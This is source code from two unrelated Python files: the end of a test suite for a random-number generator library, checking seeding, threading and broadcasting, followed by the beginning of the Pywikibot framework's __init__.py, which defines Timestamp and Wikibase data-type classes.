0.9474905694736895 - 0.16424530802218726j,
],
[
1.119247463119766 + 0.023956373851168843j,
0.8776366291514774 + 0.2865220655803411j,
],
[
0.5515508326417458 - 0.15986016780453596j,
-0.6803993941303332 + 1.1782711493556892j,
],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
random.bit_generator.seed(self.seed)
actual = random.complex_normal(loc=loc, gamma=1.0, relation=0.5, size=(3, 2))
assert_array_almost_equal(actual, desired, decimal=15)
def test_multinomial(self):
random.bit_generator.seed(self.seed)
actual = random.multinomial([5, 20], [1 / 6.0] * 6, size=(3, 2))
desired = np.array(
[
[[1, 1, 1, 1, 0, 1], [4, 5, 1, 4, 3, 3]],
[[1, 1, 1, 0, 0, 2], [2, 0, 4, 3, 7, 4]],
[[1, 2, 0, 0, 2, 0], [3, 2, 3, 4, 2, 6]],
],
dtype=np.int64,
)
assert_array_equal(actual, desired)
random.bit_generator.seed(self.seed)
actual = random.multinomial([5, 20], [1 / 6.0] * 6)
desired = np.array([[1, 1, 1, 1, 0, 1], [4, 5, 1, 4, 3, 3]], dtype=np.int64)
assert_array_equal(actual, desired)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [
Thread(target=function, args=(Generator(MT19937(s, mode="legacy")), o))
for s, o in zip(self.seeds, out1)
]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(Generator(MT19937(s, mode="legacy")), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.0] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput(object):
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (
random.exponential,
random.standard_gamma,
random.chisquare,
random.standard_t,
random.pareto,
random.weibull,
random.power,
random.rayleigh,
random.poisson,
random.zipf,
random.geometric,
random.logseries,
)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (
random.uniform,
random.normal,
random.beta,
random.gamma,
random.f,
random.noncentral_chisquare,
random.vonmises,
random.laplace,
random.gumbel,
random.logistic,
random.lognormal,
random.wald,
random.binomial,
random.negative_binomial,
)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_integers(self, endpoint):
itype = [
bool,
np.int8,
np.uint8,
np.int16,
np.uint16,
np.int32,
np.uint32,
np.int64,
np.uint64,
]
func = random.integers
high = np.array([1])
low = np.array([0])
for dt in itype:
out = func(low, high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low[0], high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low, high[0], endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular, random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
def test_seed_equivalence():
random.seed(0)
state = random.state
random.seed(1)
random.bit_generator.seed(0)
bit_generator_state = random.bit_generator.state
assert_state_equal(state, bit_generator_state)
random.seed(1)
random.state = state
assert_state_equal(state, random.state)
def test_get_state():
state = random.state
get_state = random.__getstate__()
assert state["state"]["pos"] == get_state["state"]["pos"]
assert np.all(state["state"]["key"] == get_state["state"]["key"])
@pytest.mark.skipif(NP_LT_118, reason="Can only test with NumPy >= 1.18")
@pytest.mark.parametrize("config", list(JUMP_TEST_DATA.keys()))
def test_jumped(config):
values = JUMP_TEST_DATA[config]
typ, seed_tpl, step = config
seed = seed_tpl[0] if len(seed_tpl) == 1 else list(seed_tpl)
initial_state = np.random.MT19937(seed).state
mt19937 = MT19937(mode="sequence")
mt19937.state = initial_state
mt19937.random_raw(step)
if typ == "jumped":
jumped = mt19937.jumped()
else:
jumped = mt19937._jump_tester()
key = jumped.state["state"]["key"]
if sys.byteorder == "big":
key = key.byteswap()
md5 = hashlib.md5(key)
assert md5.hexdigest() == values["jumped"]["key_md5"]
assert jumped.state["state"]["pos"] == values["jumped"]["pos"]
def test_broadcast_size_error():
mu = np.ones(3)
sigma = np.ones((4, 3))
size = (10, 4, 2)
assert random.normal(mu, sigma, size=(5, 4, 3)).shape == (5, 4, 3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=size)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(1, 3))
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(4, 1, 1))
# 1 arg
shape = np.ones((4, 3))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=size)
with pytest.raises(ValueError):
random.standard_gamma(shape, size=(3,))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=3)
# Check out
out = np.empty(size)
with pytest.raises(ValueError):
random.standard_gamma(shape, out=out)
# 2 arg
with pytest.raises(ValueError):
random.binomial(1, [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], 0.3, size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.multinomial([2, 2], [0.3, 0.7], size=(2, 1))
# 3 arg
a = random.chisquare(5, size=3)
b = random.chisquare(5, size=(4, 3))
c = random.chisquare(5, size=(5, 4, 3))
assert random.noncentral_f(a, b, c).shape == (5, 4, 3)
with pytest.raises(ValueError, match=r"Output size \(6, 5, 1, 1\) is"):
random.noncentral_f(a, b, c, size=(6, 5, 1, 1))
def test_broadcast_size_scalar():
mu = np.ones(3)
sigma = np.ones(3)
random.normal(mu, sigma, size=3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=2)
|
__init__.py
|
"""The initialization file for the Pywikibot framework."""
#
# (C) Pywikibot team, 2008-2021
#
# Distributed under the terms of the MIT license.
#
import atexit
import datetime
import inspect
import math
import re
import threading
import time
from contextlib import suppress
from decimal import Decimal
from queue import Queue
from typing import Optional, Union
from urllib.parse import urlparse
from warnings import warn
from pywikibot import config as _config
from pywikibot import exceptions
from pywikibot.__metadata__ import (
__copyright__,
__description__,
__download_url__,
__license__,
__maintainer__,
__maintainer_email__,
__name__,
__url__,
__version__,
)
from pywikibot._wbtypes import WbRepresentation as _WbRepresentation
from pywikibot.backports import cache, removesuffix
from pywikibot.bot import (
Bot,
CurrentPageBot,
WikidataBot,
calledModuleName,
handle_args,
input,
input_choice,
input_yn,
show_help,
ui,
)
from pywikibot.diff import PatchManager
from pywikibot.exceptions import (
DEPRECATED_EXCEPTIONS,
CoordinateGlobeUnknownError,
)
from pywikibot.family import AutoFamily, Family
from pywikibot.i18n import translate
from pywikibot.logging import (
critical,
debug,
error,
exception,
log,
output,
stdout,
warning,
)
from pywikibot.site import APISite, BaseSite, ClosedSite, DataSite
from pywikibot.tools import (
ModuleDeprecationWrapper as _ModuleDeprecationWrapper,
)
from pywikibot.tools import classproperty
from pywikibot.tools import deprecate_arg as _deprecate_arg
from pywikibot.tools import normalize_username
from pywikibot.tools.formatter import color_format
__all__ = (
'__copyright__', '__description__', '__download_url__', '__license__',
'__maintainer__', '__maintainer_email__', '__name__',
'__url__', '__version__',
'Bot', 'calledModuleName', 'CaptchaError', 'CascadeLockedPage',
'Category', 'CircularRedirect', 'Claim', 'Coordinate',
'CoordinateGlobeUnknownException', 'critical', 'CurrentPageBot', 'debug',
'EditConflict', 'error', 'Error', 'exception', 'FatalServerError',
'FilePage', 'handle_args', 'html2unicode', 'input', 'input_choice',
'input_yn', 'InterwikiRedirectPage', 'InvalidTitle', 'IsNotRedirectPage',
'IsRedirectPage', 'ItemPage', 'Link', 'LockedNoPage', 'LockedPage', 'log',
'NoCreateError', 'NoMoveTarget', 'NoPage', 'NoUsername',
'NoWikibaseEntity', 'OtherPageSaveError', 'output', 'Page',
'PageCreatedConflict', 'PageDeletedConflict', 'PageRelatedError',
'PageSaveRelatedError', 'PropertyPage', 'SectionError', 'Server414Error',
'Server504Error', 'ServerError', 'showDiff', 'show_help', 'Site',
'SiteDefinitionError', 'SiteLink', 'SpamblacklistError', 'stdout',
'Timestamp', 'TitleblacklistError', 'translate', 'ui', 'unicode2html',
'UnknownExtension', 'UnknownFamily', 'UnknownSite', 'UnsupportedPage',
'UploadWarning', 'url2unicode', 'User', 'warning', 'WbGeoShape',
'WbMonolingualText', 'WbQuantity', 'WbTabularData', 'WbTime', 'WbUnknown',
'WikiBaseError', 'WikidataBot',
)
class Timestamp(datetime.datetime):
"""Class for handling MediaWiki timestamps.
This inherits from datetime.datetime, so it can use all of the methods
and operations of a datetime object. To ensure that the results of any
operation are also a Timestamp object, be sure to use only Timestamp
objects (and datetime.timedeltas) in any operation.
Use Timestamp.fromISOformat() and Timestamp.fromtimestampformat() to
create Timestamp objects from MediaWiki string formats.
As these constructors are typically used to create objects using data
provided by site and page methods, some of which return a Timestamp
when previously they returned a MediaWiki string representation, these
methods also accept a Timestamp object, in which case they return a clone.
Use Site.server_time() for the current time; this is more reliable
than using Timestamp.utcnow().
"""
mediawikiTSFormat = '%Y%m%d%H%M%S'
_ISO8601Format_new = '{0:+05d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02d}Z'
def clone(self):
"""Clone this instance."""
return self.replace(microsecond=self.microsecond)
@classproperty
def ISO8601Format(cls):
"""ISO8601 format string class property for compatibility purpose."""
return cls._ISO8601Format()
@classmethod
def _ISO8601Format(cls, sep: str = 'T') -> str:
"""ISO8601 format string.
:param sep: one-character separator, placed between the date and time
:return: ISO8601 format string
"""
assert len(sep) == 1
return '%Y-%m-%d{}%H:%M:%SZ'.format(sep)
@classmethod
def fromISOformat(cls, ts, sep: str = 'T'):
"""Convert an ISO 8601 timestamp to a Timestamp object.
:param ts: ISO 8601 timestamp or a Timestamp object already
:type ts: str or Timestamp
:param sep: one-character separator, placed between the date and time
:return: Timestamp object
:rtype: Timestamp
"""
# If inadvertently passed a Timestamp object, use replace()
# to create a clone.
if isinstance(ts, cls):
return ts.clone()
return cls.strptime(ts, cls._ISO8601Format(sep))
@classmethod
def fromtimestampformat(cls, ts):
"""Convert a MediaWiki internal timestamp to a Timestamp object."""
# If inadvertently passed a Timestamp object, use replace()
# to create a clone.
if isinstance(ts, cls):
return ts.clone()
if len(ts) == 8: # year, month and day are given only
ts += '000'
return cls.strptime(ts, cls.mediawikiTSFormat)
def isoformat(self, sep='T'):
"""
Convert object to an ISO 8601 timestamp accepted by MediaWiki.
datetime.datetime.isoformat does not postfix the ISO formatted date
with a 'Z' unless a timezone is included, which causes MediaWiki
~1.19 and earlier to fail.
"""
return self.strftime(self._ISO8601Format(sep))
def totimestampformat(self):
"""Convert object to a MediaWiki internal timestamp."""
return self.strftime(self.mediawikiTSFormat)
def __str__(self):
"""Return a string format recognized by the API."""
return self.isoformat()
def __add__(self, other):
"""Perform addition, returning a Timestamp instead of datetime."""
newdt = super().__add__(other)
if isinstance(newdt, datetime.datetime):
return Timestamp(newdt.year, newdt.month, newdt.day, newdt.hour,
newdt.minute, newdt.second, newdt.microsecond,
newdt.tzinfo)
return newdt
def __sub__(self, other):
"""Perform subtraction, returning a Timestamp instead of datetime."""
newdt = super().__sub__(other)
if isinstance(newdt, datetime.datetime):
return Timestamp(newdt.year, newdt.month, newdt.day, newdt.hour,
newdt.minute, newdt.second, newdt.microsecond,
newdt.tzinfo)
return newdt
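# Illustrative usage of Timestamp (editor's sketch, not part of the original
# module). The values follow directly from the format strings defined above
# and assume nothing beyond the standard library:
#
#     ts = Timestamp.fromISOformat('2021-01-01T12:00:00Z')
#     ts.totimestampformat()            # '20210101120000' (mediawikiTSFormat)
#     str(ts)                           # '2021-01-01T12:00:00Z'
#     ts + datetime.timedelta(days=1)   # still a Timestamp, not a plain datetime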
class Coordinate(_WbRepresentation):
"""Class for handling and storing Coordinates."""
_items = ('lat', 'lon', 'entity')
@_deprecate_arg('entity', 'globe_item')
def __init__(self, lat: float, lon: float, alt=None,
precision: Optional[float] = None,
globe: Optional[str] = None, typ: str = '',
name: str = '', dim: Optional[int] = None,
site: Optional[DataSite] = None, globe_item=None,
primary: bool = False):
"""
Represent a geo coordinate.
:param lat: Latitude
:param lon: Longitude
:param alt: Altitude? TODO FIXME
:param precision: precision
:param globe: Which globe the point is on
:param typ: The type of coordinate point
:param name: The name
:param dim: Dimension (in meters)
:param site: The Wikibase site
:param globe_item: The Wikibase item for the globe, or the entity URI
of this Wikibase item. Takes precedence over 'globe'
if present.
:type globe_item: pywikibot.ItemPage or str
:param primary: True for a primary set of coordinates
"""
self.lat = lat
self.lon = lon
self.alt = alt
self._precision = precision
self._entity = globe_item
self.type = typ
self.name = name
self._dim = dim
self.site = site or Site().data_repository()
self.primary = primary
if globe:
globe = globe.lower()
elif not globe_item:
globe = self.site.default_globe()
self.globe = globe
@property
def entity(self):
"""Return the entity uri of the globe."""
if not self._entity:
if self.globe not in self.site.globes():
raise CoordinateGlobeUnknownError(
'{} is not supported in Wikibase yet.'
.format(self.globe))
return self.site.globes()[self.globe]
if isinstance(self._entity, ItemPage):
return self._entity.concept_uri()
return self._entity
def toWikibase(self) -> dict:
"""
Export the data to a JSON object for the Wikibase API.
FIXME: Should this be in the DataSite object?
:return: Wikibase JSON
"""
return {'latitude': self.lat,
'longitude': self.lon,
'altitude': self.alt,
'globe': self.entity,
'precision': self.precision,
}
@classmethod
def fromWikibase(cls, data: dict, site: DataSite):
"""
Constructor to create an object from Wikibase's JSON output.
:param data: Wikibase JSON
:param site: The Wikibase site
:rtype: Coordinate
"""
globe = None
if data['globe']:
globes = {}
for name, entity in site.globes().items():
globes[entity] = name
globe = globes.get(data['globe'])
return cls(data['latitude'], data['longitude'],
data['altitude'], data['precision'],
globe, site=site, globe_item=data['globe'])
@property
def precision(self) -> Optional[float]:
"""
Return the precision of the geo coordinate.
The precision is calculated if the Coordinate does not have a
precision, and self._dim is set.
When no precision and no self._dim exists, None is returned.
The biggest error (in degrees) will be given by the longitudinal error;
the same error in meters becomes larger (in degrees) further up north.
We can thus ignore the latitudinal error.
The longitudinal error can be derived as follows:
In small angle approximation (and thus in radians):
M{Δλ ≈ Δpos / r_φ}, where r_φ is the radius of earth at the given
latitude.
Δλ is the error in longitude.
M{r_φ = r cos φ}, where r is the radius of earth, φ the latitude
Therefore::
precision = math.degrees(
self._dim/(radius*math.cos(math.radians(self.lat))))
"""
if self._dim is None and self._precision is None:
return None
if self._precision is None and self._dim is not None:
radius = 6378137 # TODO: Support other globes
self._precision = math.degrees(
self._dim / (radius * math.cos(math.radians(self.lat))))
return self._precision
@precision.setter
def precision(self, value):
self._precision = value
def precisionToDim(self) -> Optional[int]:
"""
Convert precision from Wikibase to GeoData's dim and return the latter.
dim is calculated if the Coordinate doesn't have a dimension, and
precision is set. When neither dim nor precision are set, ValueError
is thrown.
Carrying on from the earlier derivation of precision, since
precision = math.degrees(dim/(radius*math.cos(math.radians(self.lat))))
we get::
dim = math.radians(
precision)*radius*math.cos(math.radians(self.lat))
But this returns a float value for dim, which must be an integer, so we
round it off to the nearest integer.
Therefore::
dim = int(round(math.radians(
precision)*radius*math.cos(math.radians(self.lat))))
"""
if self._dim is None and self._precision is None:
raise ValueError('No values set for dim or precision')
if self._dim is None and self._precision is not None:
radius = 6378137
self._dim = int(
round(
math.radians(self._precision) * radius * math.cos(
math.radians(self.lat))
)
)
return self._dim
def get_globe_item(self, repo: Optional[DataSite] = None,
lazy_load: bool = False):
"""
Return the ItemPage corresponding to the globe.
Note that the globe need not be in the same data repository as the
Coordinate itself.
A successful lookup is stored as an internal value to avoid the need
for repeated lookups.
:param repo: the Wikibase site for the globe, if different from that
provided with the Coordinate.
:param lazy_load: Do not raise NoPage if ItemPage does not exist.
:return: pywikibot.ItemPage
"""
if isinstance(self._entity, ItemPage):
return self._entity
repo = repo or self.site
return ItemPage.from_entity_uri(repo, self.entity, lazy_load)
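# Worked example for Coordinate.precision (editor's sketch, not from the
# original source). With the hard-coded Earth radius of 6378137 m used above,
# a feature of dim = 1000 m at latitude 52 degrees gives
#     math.degrees(1000 / (6378137 * math.cos(math.radians(52)))) ~= 0.0146
# degrees of precision; precisionToDim() applies the inverse formula and
# rounds the result back to an integer number of metres.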
class WbTime(_WbRepresentation):
"""A Wikibase time representation."""
PRECISION = {'1000000000': 0,
'100000000': 1,
'10000000': 2,
'1000000': 3,
'100000': 4,
'10000': 5,
'millenia': 6,
'century': 7,
'decade': 8,
'year': 9,
'month': 10,
'day': 11,
'hour': 12,
'minute': 13,
'second': 14
}
FORMATSTR = '{0:+012d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02d}Z'
_items = ('year', 'month', 'day', 'hour', 'minute', 'second',
'precision', 'before', 'after', 'timezone', 'calendarmodel')
def __init__(self,
year: Optional[int] = None,
month: Optional[int] = None,
day: Optional[int] = None,
hour: Optional[int] = None,
minute: Optional[int] = None,
second: Optional[int] = None,
precision: Union[int, str, None] = None,
before: int = 0,
after: int = 0,
timezone: int = 0,
calendarmodel: Optional[str] = None,
site: Optional[DataSite] = None):
"""Create a new WbTime object.
The precision can be set by the Wikibase int value (0-14) or by a human
readable string, e.g., 'hour'. If no precision is given, it is set
according to the given time units.
Timezone information is given in three different ways depending on the
time:
* Times after the implementation of UTC (1972): as an offset from UTC
in minutes;
* Times before the implementation of UTC: the offset of the time zone
from universal time;
* Before the implementation of time zones: The longitude of the place
of the event, in the range −180° to 180°, multiplied by 4 to convert
to minutes.
:param year: The year as a signed integer of between 1 and 16 digits.
:param month: Month
:param day: Day
:param hour: Hour
:param minute: Minute
:param second: Second
:param precision: The unit of the precision of the time.
:param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
:param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
:param timezone: Timezone information in minutes.
:param calendarmodel: URI identifying the calendar model
:param site: The Wikibase site
"""
if year is None:
raise ValueError('no year given')
self.precision = self.PRECISION['second']
if second is None:
self.precision = self.PRECISION['minute']
second = 0
if minute is None:
self.precision = self.PRECISION['hour']
minute = 0
if hour is None:
self.precision = self.PRECISION['day']
hour = 0
if day is None:
self.precision = self.PRECISION['month']
day = 1
if month is None:
self.precision = self.PRECISION['year']
month = 1
self.year = year
self.month = month
self.day = day
self.hour = hour
self.minute = minute
self.second = second
self.after = after
self.before = before
self.timezone = timezone
if calendarmodel is None:
if site is None:
site = Site().data_repository()
if site is None:
raise ValueError('Site {} has no data repository'
.format(Site()))
calendarmodel = site.calendarmodel()
self.calendarmodel = calendarmodel
# if precision is given it overwrites the autodetection above
if precision is not None:
if (isinstance(precision, int)
and precision in self.PRECISION.values()):
self.precision = precision
elif precision in self.PRECISION:
self.precision = self.PRECISION[precision]
else:
raise ValueError('Invalid precision: "{}"'.format(precision))
@classmethod
def fromTimestr(cls,
datetimestr: str,
precision: Union[int, str] = 14,
before: int = 0,
after: int = 0,
timezone: int = 0,
calendarmodel: Optional[str] = None,
site: Optional[DataSite] = None):
"""Create a new WbTime object from a UTC date/time string.
The timestamp differs from ISO 8601 in that:
* The year is always signed and has between 1 and 16 digits;
* The month, day and time are zero if they are unknown;
* The Z is discarded since time zone is determined from the timezone
param.
:param datetimestr: Timestamp in a format resembling ISO 8601,
e.g. +2013-01-01T00:00:00Z
:param precision: The unit of the precision of the time.
:param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
:param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
:param timezone: Timezone information in minutes.
:param calendarmodel: URI identifying the calendar model
:param site: The Wikibase site
:rtype: pywikibot.WbTime
"""
match = re.match(r'([-+]?\d+)-(\d+)-(\d+)T(\d+):(\d+):(\d+)Z',
datetimestr)
if not match:
raise ValueError("Invalid format: '{}'".format(datetimestr))
t = match.groups()
return cls(int(t[0]), int(t[1]), int(t[2]),
int(t[3]), int(t[4]), int(t[5]),
precision, before, after, timezone, calendarmodel, site)
@classmethod
def fromTimestamp(cls, timestamp, precision: Union[int, str] = 14,
before: int = 0, after: int = 0,
timezone: int = 0, calendarmodel: Optional[str] = None,
site: Optional[DataSite] = None):
"""
Create a new WbTime object from a pywikibot.Timestamp.
:param timestamp: Timestamp
:type timestamp: pywikibot.Timestamp
:param precision: The unit of the precision of the time.
:param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
:param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
:param timezone: Timezone information in minutes.
:param calendarmodel: URI identifying the calendar model
:param site: The Wikibase site
:rtype: pywikibot.WbTime
"""
return cls.fromTimestr(timestamp.isoformat(), precision=precision,
before=before, after=after,
timezone=timezone, calendarmodel=calendarmodel,
site=site)
def toTimestr(self, force_iso: bool = False) -> str:
"""
Convert the data to a UTC date/time string.
See fromTimestr() for differences between output with and without
force_iso.
:param force_iso: whether the output should be forced to ISO 8601
:return: Timestamp in a format resembling ISO 8601
"""
if force_iso:
return Timestamp._ISO8601Format_new.format(
self.year, max(1, self.month), max(1, self.day),
self.hour, self.minute, self.second)
return self.FORMATSTR.format(self.year, self.month, self.day,
self.hour, self.minute, self.second)
def toTimestamp(self) -> Timestamp:
"""
Convert the data to a pywikibot.Timestamp.
:raises ValueError: instance value cannot be represented using
Timestamp
"""
if self.year <= 0:
raise ValueError('You cannot turn BC dates into a Timestamp')
return Timestamp.fromISOformat(
self.toTimestr(force_iso=True).lstrip('+'))
def toWikibase(self) -> dict:
"""
Convert the data to a JSON object for the Wikibase API.
:return: Wikibase JSON
"""
json = {'time': self.toTimestr(),
'precision': self.precision,
'after': self.after,
'before': self.before,
'timezone': self.timezone,
'calendarmodel': self.calendarmodel
}
return json
@classmethod
def fromWikibase(cls, wb: dict, site: Optional[DataSite] = None):
"""
Create a WbTime from the JSON data given by the Wikibase API.
:param wb: Wikibase JSON
:param site: The Wikibase site
:rtype: pywikibot.WbTime
"""
return cls.fromTimestr(wb['time'], wb['precision'],
wb['before'], wb['after'],
wb['timezone'], wb['calendarmodel'], site)
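# Illustrative usage of WbTime (editor's sketch, not part of the original
# module). The calendar-model URI below is an assumption (the usual proleptic
# Gregorian calendar item); passing it explicitly avoids the Site() lookup in
# the constructor:
#
#     cal = 'http://www.wikidata.org/entity/Q1985727'
#     t = WbTime(year=2010, month=5, calendarmodel=cal)
#     t.precision      # 10 == WbTime.PRECISION['month'], because day was omitted
#     t.toTimestr()    # '+00000002010-05-01T00:00:00Z' (FORMATSTR, day defaults to 1)
#     WbTime.fromTimestr(t.toTimestr(), precision='month', calendarmodel=cal)
#                      # parses the same fields back via the regex in fromTimestr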
class WbQuantity(_WbRepresentation):
"""A Wikibase quantity representation."""
_items = ('amount', 'upperBound', 'lowerBound', 'unit')
@staticmethod
def _require_errors(site: DataSite) -> bool:
"""
Check if Wikibase site is so old it requires error bounds to be given.
If no site object is supplied, it raises a warning and returns False.
:param site: The Wikibase site
"""
if not site:
warning(
"WbQuantity now expects a 'site' parameter. This is needed to "
'ensure correct handling of error bounds.')
return False
return site.mw_version < '1.29.0-wmf.2'
@staticmethod
def _todecimal(value: str) -> Optional[Decimal]:
"""
Convert a string to a Decimal for use in WbQuantity.
None value is returned as is.
:param value: decimal number to convert
"""
if isinstance(value, Decimal):
return value
if value is None:
return None
return Decimal(str(value))
@staticmethod
def _fromdecimal(value: Decimal) -> Optional[str]:
"""
Convert a Decimal to a string representation suitable for WikiBase.
None value is returned as is.
:param value: decimal number to convert
"""
if value is None:
return None
return format(value, '+g')
def __init__(self, amount, unit=None, error=None,
site: Optional[DataSite] = None):
"""
Create a new WbQuantity object.
:param amount: number representing this quantity
:type amount: str or Decimal. Other types are accepted, and
converted via str to Decimal.
:param unit: the Wikibase item for the unit or the entity URI of this
Wikibase item.
:type unit: pywikibot.ItemPage, str or None
:param error: the uncertainty of the amount (e.g. ±1)
:type error: same as amount, or tuple of two values, where the first
value is the upper error and the second is the lower error value.
:param site: The Wikibase site
"""
if amount is None:
raise ValueError('no amount given')
self.amount = self._todecimal(amount)
self._unit = unit
self.site = site or Site().data_repository()
# also allow entity URIs to be provided via unit parameter
if isinstance(unit, str) \
and unit.partition('://')[0] not in ('http', 'https'):
raise ValueError("'unit' must be an ItemPage or entity uri.")
if error is None and not self._require_errors(site):
self.upperBound = self.lowerBound = None
else:
if error is None:
upperError = lowerError = Decimal(0)
elif isinstance(error, tuple):
upperError = self._todecimal(error[0])
lowerError = self._todecimal(error[1])
else:
upperError = lowerError = self._todecimal(error)
self.upperBound = self.amount + upperError
self.lowerBound = self.amount - lowerError
@property
def unit(self):
"""Return _unit's entity uri or '1' if _unit is None."""
if isinstance(self._unit, ItemPage):
return self._unit.concept_uri()
return self._unit or '1'
def get_unit_item(self, repo: Optional[DataSite] = None,
lazy_load: bool = False):
"""
Return the ItemPage corresponding to the unit.
Note that the unit need not be in the same data repository as the
WbQuantity itself.
A successful lookup is stored as an internal value to avoid the need
for repeated lookups.
:param repo: the Wikibase site for the unit, if different from that
provided with the WbQuantity.
:param lazy_load: Do not raise NoPage if ItemPage does not exist.
:return: pywikibot.ItemPage
"""
if not isinstance(self._unit, str):
return self._unit
repo = repo or self.site
self._unit = ItemPage.from_entity_uri(repo, self._unit, lazy_load)
return self._unit
def toWikibase(self) -> dict:
"""
Convert the data to a JSON object for the Wikibase API.
:return: Wikibase JSON
"""
json = {'amount': self._fromdecimal(self.amount),
'upperBound': self._fromdecimal(self.upperBound),
'lowerBound': self._fromdecimal(self.lowerBound),
'unit': self.unit
}
return json
@classmethod
def fromWikibase(cls, wb: dict, site: Optional[DataSite] = None):
"""
Create a WbQuantity from the JSON data given by the Wikibase API.
:param wb: Wikibase JSON
:param site: The Wikibase site
:rtype: pywikibot.WbQuantity
"""
amount = cls._todecimal(wb['amount'])
upperBound = cls._todecimal(wb.get('upperBound'))
lowerBound = cls._todecimal(wb.get('lowerBound'))
bounds_provided = (upperBound is not None and lowerBound is not None)
error = None
if bounds_provided or cls._require_errors(site):
error = (upperBound - amount, amount - lowerBound)
if wb['unit'] == '1':
unit = None
else:
unit = wb['unit']
return cls(amount, unit, error, site)
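# Illustrative usage of WbQuantity (editor's sketch, not part of the original
# module). 'repo' stands for an already-configured DataSite and is assumed
# here so the constructor does not fall back to Site().data_repository():
#
#     q = WbQuantity(amount='1234', error=1, site=repo)
#     q.toWikibase()
#     # {'amount': '+1234', 'upperBound': '+1235',
#     #  'lowerBound': '+1233', 'unit': '1'}
#     WbQuantity.fromWikibase(q.toWikibase(), site=repo)  # round-trips the bounds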
class WbMonolingualText(_WbRepresentation):
"""A Wikibase monolingual text representation."""
_items = ('text', 'language')
def __init__(self, text: str, language: str):
"""
Create a new WbMonolingualText object.
:param text: text string
:param language: language code of the string
"""
if not text or not language:
raise ValueError('text and language cannot be empty')
self.text = text
self.language = language
def toWikibase(self) -> dict:
"""
Convert the data to a JSON object for the Wikibase API.
:return: Wikibase JSON
"""
json = {'text': self.text,
'language': self.language
}
return json
@classmethod
def fromWikibase(cls, wb: dict):
"""
Create a WbMonolingualText from the JSON data given by the Wikibase API.
:param wb: Wikibase JSON
:rtype: pywikibot.WbMonolingualText
"""
return cls(wb['text'], wb['language'])
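# Illustrative usage of WbMonolingualText (editor's sketch, not part of the
# original module):
#
#     mono = WbMonolingualText(text='La Tour Eiffel', language='fr')
#     mono.toWikibase()                          # {'text': 'La Tour Eiffel', 'language': 'fr'}
#     WbMonolingualText(text='', language='fr')  # raises ValueError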
class _WbDataPage(_WbRepresentation):
"""
A Wikibase representation for data pages.
A temporary implementation until T162336 has been resolved.
Note that this class cannot be used directly.
"""
_items = ('page', )
@classmethod
def _get_data_site(cls, repo_site: DataSite) -> APISite:
"""
Return the site serving as a repository for a given data type.
Must be implemented in the extended class.
:param repo_site: The Wikibase site
"""
raise NotImplementedError
@classmethod
def _get_type_specifics(cls, site: DataSite) -> dict:
"""
Return the specifics for a given data type.
Must be implemented in the extended class.
The dict should have three keys:
* ending: str, required filetype-like ending in page titles.
* label: str, describing the data type for use in error messages.
* data_site: APISite, site serving as a repository for
the given data type.
:param site: The Wikibase site
"""
raise NotImplementedError
@staticmethod
def _validate(page, data_site, ending: str, label: str):
"""
Validate the provided page against general and type specific rules.
:param page: Page containing the data.
:type page: pywikibot.Page
:param data_site: The site serving as a repository for the given
data type.
:type data_site: APISite
:param ending: Required filetype-like ending in page titles.
E.g. '.map'
:param label: Label describing the data type in error messages.
"""
if not isinstance(page, Page):
raise ValueError(
'Page {} must be a pywikibot.Page object not a {}.'
.format(page, type(page)))
# validate page exists
if not page.exists():
raise ValueError('Page {} must exist.'.format(page))
